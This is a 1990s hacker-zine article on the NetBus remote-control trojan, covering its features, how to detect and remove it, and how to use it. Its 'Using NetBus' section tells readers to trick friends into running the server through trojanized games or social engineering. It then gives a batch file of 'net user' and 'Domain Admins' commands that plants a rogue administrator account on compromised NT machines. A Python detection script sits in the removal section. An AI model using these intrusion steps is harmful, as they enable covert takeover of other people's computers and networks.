Wreaking Havoc with NetBus

by Sikdogg

NetBus, just like Back Orifice, lets a user take control of a remote host on a TCP/IP network.

The two programs overlap in functionality, but each has features that set it apart from the other.  One feature that makes NetBus more fun to use is that it runs in both Windows 95/98 and NT!  Back Orifice currently runs on only the Windows 95/98 platform.  NetBus was written by a Swedish programmer named Carl-Fredrik Neikter in March 1998.  He first released NetBus 1.53 in April and then NetBus v1.6 in August.  Even though NetBus hasn't gotten much press, it is still pretty widespread.

How NetBus Works

In principle, NetBus and Back Orifice work the same way - they have a server (the program that runs on the remote host) and a client (the program you run on your PC).

Once the server is running on a remote PC, the client is run on your computer to find and exploit the remote PC.  Because the NetBus server is larger than the Back Orifice server, some believe that NetBus is "less stealthy."  I disagree.  The NetBus server can be renamed and/or Trojanized just like Back Orifice using Saran Wrap or Silk Rope.

You can also download Whack Job, which contains a game called Whack-a-Mole (which has the NetBus server in it - there is also a version of Whack-a-Mole with Back Orifice), and send it to your friends.  When they run it, NetBus gets installed on their PC.

One disadvantage of NetBus is that you can't change the port that NetBus uses to communicate.  Its default is port 12345.

There are currently two versions of NetBus in circulation, version 1.53 and version 1.6.

Version 1.6 is used more often because it has all the functionality of v1.53 and some upgrades, so I'm going to save space by eliminating v1.53 from this article.  This article was written using the README.TXT that comes with NetBus, a lot of text available on the net, and from my personal use of NetBus at work, at home, and at school.

NetBus v1.6

The NetBus v1.6 server is called: Patch.exe

It can be renamed anything as long as you keep the EXE extension.  If you change the extension, it should still work technically, but the problem lies in Windows itself.

If you change the extension Windows won't know that it's an executable and it probably won't run.  The server size is 494,592 bytes (v1.7) versus approximately 124k for Back Orifice.

When the server program is run, it doesn't disappear like Back Orifice.  It just stays there and looks like nothing happened and can even be deleted.  What it does is copy itself to the Windows\System directory and start up every time Windows restarts.

It also adds itself to the Registry by creating the key HKEY_CURRENT_USER\PATCH (PATCH would be replaced by whatever you renamed the server to be).

It also places a value in the key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NAME which shows the full path of the server file.

The NAME is the name of the server without the extension, and it should always be capitalized.  The default is PATCH.  This is how Windows starts the NetBus server every time it starts.

The NetBus server actually opens two TCP ports.  It listens for a client on port 12345 and responds on port 12346.

What makes NetBus really nice is its GUI interface.  It's so intuitive and user friendly that even newbies shouldn't have problems figuring it out.

Here's a description of some of the buttons/features on NetBus v1.6:

  • Server admin  - Lets you add/change passwords, close, or remove the server from the remote host.
  • Show image  - Lets you display a BMP image on the screen that the user can't remove.
  • Swap mouse  - Lets you swap the mouse buttons.
  • Start program  - Lets you run the program on the Program/URL window.
  • Msg manager  - Lets you send messages to remote hosts and allow them to respond back.
  • Screendump  - Lets you see the remote host's screen.
  • Get info  - Lets you get info about the host, like who's logged on.
  • Exit Windows  - Lets you log off, power off, reboot, or shutdown the host.
  • Active wnds  - Lets you see all the active windows on the host and close any of them.
  • Control mouse  - Lets you control the mouse on the host's computer.
  • Key manager  - Lets you disable the host's keyboard.
  • File manager  - Lets you see the host's hard drives, upload, download, and delete files.

Detection/Removal

NetBus is pretty easy to remove from your PC if you've been infected.

To find out if you have NetBus installed on your PC you can use any of these methods:

•  Telnet to your computer using localhost or 127.0.0.1 for an address and port 12345.  Example: telnet 127.0.0.1 12345

•  If you are infected you will get the message: NetBus 1.60 x or NetBus 1.53 x, depending on the version installed.

•  You can download and run the NetBus client and try to connect to localhost.  If you get a connection or a password dialog box, your PC is infected.  The NetBus password is stored in the Registry in HKEY_CURRENT_USER\PATCH\Settings\ServerPwd.  (PATCH is the default name and may have been changed.  Look for unusual names.)

•  You can run: netstat -an | find "12345" - if you're infected, you will get: TCP 0.0.0.0:12345 0.0.0.0 LISTENING

•  Check the Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run - this key will show the full path and name of the server.  (PATCH is the default name and may have been changed.  Look for unusual names.)
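The checks above (the telnet greeting, the netstat listener, and the Run key entry) can be scripted so a machine is checked the same way every time.  The following is an added example, not code from the article or from NetBus itself: it classifies the greeting the article says the server sends, scans netstat -an output for listeners on 12345 and 12346 (the two ports the article says the server opens), and applies a heuristic built from the article's description of the Run key entry (an all-caps value name equal to the server filename minus .EXE, pointing at a full path under Windows\System).  The netstat lines and Run values in the block are constructed sample data; the optional winreg reader only works on Windows.

```python
import re
import socket
from typing import Dict, Iterable, List, Optional, Tuple

# Ports the article says the v1.6 server opens: it listens on 12345 and responds on 12346.
NETBUS_PORTS = {12345, 12346}

# Greeting the article says you see after "telnet 127.0.0.1 12345":
# "NetBus 1.60 x" or "NetBus 1.53 x", depending on the version.
BANNER_RE = re.compile(rb"^NetBus (1\.60|1\.53) x")


def classify_banner(data: bytes) -> Optional[str]:
    """Return the NetBus version string if `data` is the server's greeting, else None."""
    m = BANNER_RE.match(data.strip())
    return m.group(1).decode() if m else None


def grab_banner(host: str = "127.0.0.1", port: int = 12345, timeout: float = 2.0) -> Optional[str]:
    """Do what the telnet check does: connect to the port and classify what the listener sends.
    Returns None when nothing is listening or the greeting is not NetBus's."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            data = s.recv(64)
    except OSError:
        return None
    return classify_banner(data)


def netbus_listeners(netstat_lines: Iterable[str]) -> List[str]:
    """Equivalent of `netstat -an | find "12345"`, but it checks the state column and both ports.
    Returns the local addresses that are LISTENING on a NetBus port."""
    hits = []
    for line in netstat_lines:
        fields = line.split()
        if len(fields) < 4 or fields[0].upper() != "TCP":
            continue  # header lines, blank lines, UDP
        local, state = fields[1], fields[-1]
        port = local.rsplit(":", 1)[-1]
        if port.isdigit() and int(port) in NETBUS_PORTS and state.upper() == "LISTENING":
            hits.append(local)
    return hits


def suspicious_run_entries(run_values: Dict[str, str]) -> List[Tuple[str, str]]:
    """Heuristic from the article: the server registers itself under
    HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run with an all-caps value name equal
    to its filename without the extension (default PATCH) and the full path of the .EXE it
    copied into Windows\\System.  Flag entries that match that pattern."""
    flagged = []
    for name, path in run_values.items():
        filename = path.replace("/", "\\").rsplit("\\", 1)[-1]
        stem, _, ext = filename.rpartition(".")
        if not stem:  # no dot in the filename at all
            stem, ext = filename, ""
        in_system_dir = "\\SYSTEM\\" in path.upper()
        if ext.upper() == "EXE" and name.isupper() and name == stem.upper() and in_system_dir:
            flagged.append((name, path))
    return flagged


def read_run_values() -> Dict[str, str]:
    """Read the real Run key on Windows (empty dict elsewhere). winreg is part of the stdlib."""
    try:
        import winreg
    except ImportError:
        return {}
    values = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run") as key:
        i = 0
        while True:
            try:
                name, data, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            values[name] = str(data)
            i += 1
    return values


# Constructed sample data in the layout `netstat -an` prints; not captured from a real host.
SAMPLE_NETSTAT = [
    "Active Connections",
    "  Proto  Local Address          Foreign Address        State",
    "  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING",
    "  TCP    0.0.0.0:12346          0.0.0.0:0              LISTENING",
    "  TCP    192.168.1.5:1037       192.168.1.9:12345      ESTABLISHED",
    "  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING",
]

# Constructed Run values: the default PATCH entry beside a benign one.
SAMPLE_RUN = {
    "PATCH": "C:\\WINDOWS\\SYSTEM\\patch.exe",
    "ScanRegistry": "C:\\WINDOWS\\scanregw.exe /autorun",
}

if __name__ == "__main__":
    print("listeners:", netbus_listeners(SAMPLE_NETSTAT))
    print("run entries:", suspicious_run_entries(SAMPLE_RUN))
    print("banner on localhost:", grab_banner())
```

Run it as-is to check the sample data; on a live machine, feed it the output of netstat -an and the result of read_run_values() instead.  The Run key heuristic only catches a server left with the naming pattern the article describes, which is why the article's "look for unusual names" advice still applies to whatever it does not flag.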

To remove the server, you can use any of these methods:

•  Get the password (if necessary), run the NetBus client, make a connection to localhost, enter the password (if necessary), go to Server admin -> Remove server.

•  Find the path and server name in the Registry, remove the Registry entry, restart Windows, remove the server file from Windows Explorer.

•  Find the path and server name in the Registry, boot to DOS, and manually remove server file.  (If after using this method, you get an error at startup about Windows not being able to find some program files, go to the Registry and remove the pathname of the NetBus server.)

•  Download and install NetBuster on your system and it will tell you if you have NetBus installed and if it is ever installed on your system at a later time.  It will also ask you if you want it removed.

Using NetBus

Making a connection to the remote host is easy:

1.)  You need to get the IP address of the remote host.  If you don't know how to get someone's IP address you have no business using NetBus.

2.)  Get the NetBus server on the remote PC and execute it.  You can use your "social engineering" skills, Whack-a-Mole, or you can use Silk Rope to attach it to some goofy program and send it to friends (my favorite method).  (Note:  The remote PC must be either connected to a TCP/IP network or the Internet in order for you to make a connection.)

3.)  Once you make the connection you can use any of the commands listed above.

Here's a neat trick I found on Ecoli's webpage: 24.3.219.20/ftproot/security/security%20 web/netbus.html

You can use this to create an administrator account on an NT server once you get the NetBus server installed and are able to establish a connection with the NT box:

Create a batch file with the following lines:

net user ecoli /add
net localgroup administrators ecoli /add
net group "Domain Admins" ecoli /add

(Note:  Ecoli is a sample username - any name will do).

Save the file to your hard drive.  For example, let's say we save the file as ecoliadm.bat on the C: drive.

Connect to the target PC using NetBus.  Click File manager -> Upload - and choose: C:\ecoliadm.bat

Type in C:\ecoliadm.bat as the upload path and click Close.  Type C:\ecoliadm.bat in the Program/URL text box.  Click Start program.

Closing

NetBus is a very fun and effective tool that does everything it claims and then some.

Contrary to what the media would have us all believe, programs like NetBus and Back Orifice can be used for legitimate purposes.  In fact, I personally know more than one network administrator who uses NetBus to remotely administer their NT network.

So when using NetBus and/or similar tools, try to remember to be responsible and not destroy other people's property.
